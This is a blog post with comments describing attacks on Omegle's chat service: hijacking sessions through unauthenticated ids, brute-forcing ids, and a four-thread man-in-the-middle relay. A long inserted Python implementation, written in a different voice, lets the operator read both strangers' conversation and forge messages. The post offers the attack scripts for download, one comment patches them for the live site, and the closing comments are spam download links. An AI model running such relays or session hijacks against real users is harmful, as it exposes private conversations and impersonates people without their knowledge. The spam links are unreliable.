You: POST omegle.com/start
Omg: HTTP "123456" <-- random 6-character 'username' (a-z A-Z 0-9 _ -)
You: POST omegle.com/events?id=123456
Omg: HTTP [["connected"]]
You: POST omegle.com/send?msg=hello&id=123456
Omg: HTTP win <-- funny
You: POST omegle.com/events?id=123456
Omg: HTTP [["gotMessage", "hey"]] <-- message from other person
...
You: POST omegle.com/disconnect?id=123456 <-- quit the chat
Seeing this immediately sparked some thought. Can I request events for other users? Can I send messages to other users? Can I disconnect other users? It seemed all you needed to do was post the command with the user id you wanted to act on: nothing in the trace besides the id identifies the caller, and nothing ties the id to the browser or connection that called /start. As it turns out it's almost even better. If you post for events using someone else's user id it will "implode" their chat:
What's better is that the other person is still connected and has no idea that their 'stranger' has been imploded. Now you can keep talking to the other person and they have no idea what just happened.
There is one major problem with this, however. According to:
http://omegle.com/count
there are on average only about 3k users online at a given time, but the number of possible user ids is
(26+26+10+1+1)^6 = 64^6 = 68,719,476,736
so a random guess lands on a live session with probability of about 3,000 / 68,719,476,736 ≈ 4.4 × 10^-8, roughly one hit per 23 million requests. That is a terrible chance of finding someone quickly. I actually started making a brute forcer (omegle_brute_force.py) but quickly realized that this was an ill-fated attempt.
So if you can't find the users, why not have the users come to you? I realized that Omegle is a prime target for a classic man-in-the-middle attack. The idea is super simple. I connect to two strangers just like normal, but instead of me talking to them, they talk to each other through me. As long as I don't inject any messages or anything weird they have no idea that I'm even there: each of them is talking to a perfectly ordinary Omegle session, and Omegle gives them no way to tell a relay from a real stranger. Here is how the program looks:
As you can see I have a legitimate connection to both client 1 and client 2, but I am transparently passing their messages right through me to the other person.
Doing this was kinda tricky. Whenever you POST for events, the request blocks until there is an event to return (it is a long poll). This means that with a single-threaded program each person would have to take turns talking, since the program would block every time I polled for their messages. Even most two-threaded setups have the same problem. The solution I came up with I feel works pretty well. There are four total threads:
1) Sending to client 1
2) Receiving from client 1
3) Sending to client 2
4) Receiving from client 2
Every time a receive thread gets a message it pushes it onto a FIFO queue, so that the sending thread for the other side can retrieve the message at its leisure (a queue rather than a stack, so messages go out in the order they were typed). The result? It doesn't matter if a POST blocks, because the sender thread can still work through the queue and the other threads can still send and receive messages.
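To make the four-thread design concrete, here is an added example of my own (not code from the post's scripts) that replays the protocol trace at the top of the post and the relay described above against a constructed, in-memory stand-in for omegle.com, so it runs offline. The endpoint names and the ["connected"] / ["gotMessage", ...] event shapes come from the trace; the "strangerDisconnected" event name, the first-come-first-served pairing rule, the victim names alice and bob, and the Relay.inject helper are assumptions. It also shows the two points the post raises: the id is the only thing the server checks, and a message can be forged to one side as if the other had typed it.

```python
import queue
import secrets
import string
import threading

# Constructed stand-in for omegle.com; "strangerDisconnected" is an assumed event name.
ID_ALPHABET = string.ascii_letters + string.digits + "_-"


class FakeOmegle:
    """In-memory Omegle: the id is the only credential, so whoever knows it owns the session."""
    def __init__(self):
        self.inbox = {}      # id -> queue of pending events, drained by /events
        self.partner = {}    # id -> id of the paired stranger
        self.waiting = None  # id of a user still waiting for a stranger

    def start(self):
        """POST /start: mint a 6-char id and pair it with whoever is waiting."""
        uid = "".join(secrets.choice(ID_ALPHABET) for _ in range(6))
        self.inbox[uid] = queue.Queue()
        if self.waiting is None:
            self.waiting = uid
        else:
            other, self.waiting = self.waiting, None
            self.partner[uid], self.partner[other] = other, uid
            self.inbox[uid].put(["connected"])
            self.inbox[other].put(["connected"])
        return uid

    def events(self, uid, timeout=None):  # POST /events?id=: long poll, blocks until an event exists
        try:
            return [self.inbox[uid].get(timeout=timeout)]
        except queue.Empty:
            return []

    def send(self, uid, msg):
        """POST /send?id=&msg=: delivered to uid's partner, whoever really posted it."""
        self.inbox[self.partner[uid]].put(["gotMessage", msg])
        return "win"

    def disconnect(self, uid):
        """POST /disconnect?id=: the partner is told the stranger left."""
        other = self.partner.pop(uid, None)
        if other is not None:
            self.partner.pop(other, None)
            self.inbox[other].put(["strangerDisconnected"])


class Relay:
    """Four-thread man in the middle: per side, one thread blocks in /events and one drains a FIFO queue."""
    def __init__(self, server):
        self.server = server
        self.ids = [server.start(), server.start()]     # real session with victim 0 / victim 1
        self.outbound = [queue.Queue(), queue.Queue()]  # messages waiting to go TO side i
        self.transcript = []                            # everything the operator sees
        self.stopped = threading.Event()
        for side in (0, 1):
            for loop in (self._recv_loop, self._send_loop):
                threading.Thread(target=loop, args=(side,), daemon=True).start()

    def _recv_loop(self, side):
        while not self.stopped.is_set():  # short timeout only so `stopped` gets noticed
            for event in self.server.events(self.ids[side], timeout=0.05):
                if event[0] == "gotMessage":
                    self.transcript.append((side, event[1]))
                    self.outbound[1 - side].put(event[1])  # hand it to the other side
                elif event[0] == "strangerDisconnected":
                    self.outbound[1 - side].put(None)      # sentinel: hang up the other side

    def _send_loop(self, side):
        while not self.stopped.is_set():
            try:
                msg = self.outbound[side].get(timeout=0.05)
            except queue.Empty:
                continue
            if msg is None:
                self.server.disconnect(self.ids[side])
                self.stopped.set()
            else:
                self.server.send(self.ids[side], msg)  # posted under the relay's own id

    def inject(self, side, msg):
        self.outbound[side].put(msg)  # forged: arrives looking like the stranger typed it


def demo():
    """alice and bob chat through the relay; returns what each victim's polls saw."""
    omegle = FakeOmegle()
    alice = omegle.start()   # alice waits for a stranger...
    relay = Relay(omegle)    # ...and is paired with the relay's first session;
    bob = omegle.start()     # bob is paired with the relay's second session
    seen = {"alice": [], "bob": []}
    pull = lambda name, uid: seen[name].append(omegle.events(uid, timeout=2)[0])
    pull("alice", alice); pull("bob", bob)             # ["connected"] on both sides
    omegle.send(alice, "hello"); pull("bob", bob)      # relayed, never delivered directly
    omegle.send(bob, "hey"); pull("alice", alice)
    relay.inject(1, "tell me more"); pull("bob", bob)  # forged; bob cannot tell
    omegle.disconnect(alice); pull("bob", bob)         # relay forwards the hang-up
    relay.stopped.set()
    return {**seen, "transcript": list(relay.transcript)}
```

Calling demo() runs the whole exchange: alice's "hello" reaches bob only via the relay's second session, the relay's transcript holds both sides of the conversation, bob receives a message alice never typed, and bob's last event is the disconnect the relay forwarded. The queue being FIFO is what keeps the relay invisible; a stack would deliver a burst of messages in reverse order.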
A classic man in the middle attack:
This has some interesting possibilities. I can send messages to one of the clients on the other's behalf and the person will have no idea that I sent it. Also, what about connecting more than 2 people together? There is no reason I couldn't connect multiple people together in a chat and maybe even append a user tag to each of their messages.
Omegle is a pretty interesting site, and you've got to hand it to Leif K-Brooks for (apparently) single-handedly making such a popular site at only 18. I hope that he can add some needed security to Omegle to prevent this kind of attack in the future. At minimum, the events, send and disconnect endpoints should check that the caller actually owns the id (for example by binding it to the cookie or connection that called /start) rather than accepting the bare id as proof; that closes the implode and hijack problem, though not the relay, which looks to Omegle like two ordinary users.
Download my programs here [mirror].
omegle_man_in_middle.py - program described above
omegle_brute_force.py - attempts to guess user ids and post for events
omegle_class.py - generic class for interacting with omegle
omegle_connect_view.py - connects to Omegle and posts for events
omegle_multi_connect.py - connects to multiple people at once; proof of concept that multiple connections can be made
omegle_send.py - send messages using a user id
EDIT:
Found another Omegle man-in-the-middle attack written in Perl [here]
Very very interesting, great article.
Hi, seems that the link to your Python scripts doesn't work anymore :( Could you please re-upload it?
@anon
Sorry, I don't know what's going on with my school's hosting. I put up a mirror.
Thanks for the quick reaction ;) but... I don't know if the problem is with my connection... it throws me HTTP 101 ERR_CONNECTION_RESET on that mirror :(
@anon
Oops! Sorry, I had the wrong port in the link. Try it now, it should be good.
Thanks a lot man... I was trying to make a JS web client which would connect to Omegle and have these nice features... but it looks like I'm stuck with the limitation that XMLHttpRequests can only be sent to your own domain... maybe I'll solve it... dunno :) but for now I'm giving up, I guess...
Really great and useful article, keep up the good work ;-)
Max
Omegle has changed slightly and the scripts are broken.
I fixed omegle_man_in_middle.py thus:
from urllib import urlencode  # Python 2, as in the original scripts; con_one/con_two are the script's httplib.HTTPConnection objects
params_start = urlencode({'rcs': "1", 'spid': ''})  # /start now expects these form fields
con_one.request("POST", "/start", params_start, headers)
con_two.request("POST", "/start", params_start, headers)
I don't know if those parameters were ever used on Omegle before, but they are necessary now. The site has added a video chat feature; this may be the reason.
Also note that a GET request to /start also returns an ID, so you could just use
con_one.request("GET", "/start", None, headers)  # a GET carries no body: pass None rather than 0
etc.
Hey, very informative article here. I was on Omegle and some son of a bitch found out my Facebook username. Any idea how they did that? Is it even possible theoretically? Or am I more likely dealing with a script kiddie who I personally know and who has a grudge against me?
The SOB didn't really find out your username, though it can rattle your nerves when they do that! I spent a bit of time looking into the possibilities, and unlike Chatroulette (which does connect users directly and thus exposes your outward-facing IP address), all communication on Omegle is between you and Omegle's system. There isn't anything that you don't type that the person on the other end can get.
As for how it was done, it's an 'exploit' of the fact that if a user (you in this case) is logged into Facebook in another tab in the same browser, and selects a link of the form
http://www.facebook.com/profile.php?id=2018293050400
Facebook will present the user's own profile page. If the user is not logged into Facebook, then the login page is displayed. Everything from the question mark to the right is fluff that is ignored, but it makes it look like the person found a legit link.
Rest easy and know that your computer wasn't accessed (this time). In general, it's just as risky to click on links that are sent to you via Omegle as it would be to click on something sent to you in an email.
Have a great day!
Similar idea: http://kitakitsune.org/texty/rc0d3z/omegleProxy.html
Do you know of an Omegle chat script? For developing a chat website...
I wonder if you fixed your script for their new updates?
Was wondering the same thing :P Just discovered this. I found the problem wasn't connecting or receiving messages. It was parsing them "through" me to the opposite user. What happens is I receive all the messages but the other person never receives his/her reply. I may fix this myself if you wouldn't mind.
Dear Bear24rw,
I think you should consider using apostrophes in your contributions. They would make you appear a lot more intelligent.
So does this still work? How do you run it? New to Python.
ReplyDeleteMax Thrun'S Project Blog: Omegle.Com Man In The Middle Attack >>>>> Download Now
ReplyDelete>>>>> Download Full
Max Thrun'S Project Blog: Omegle.Com Man In The Middle Attack >>>>> Download LINK
>>>>> Download Now
Max Thrun'S Project Blog: Omegle.Com Man In The Middle Attack >>>>> Download Full
>>>>> Download LINK jV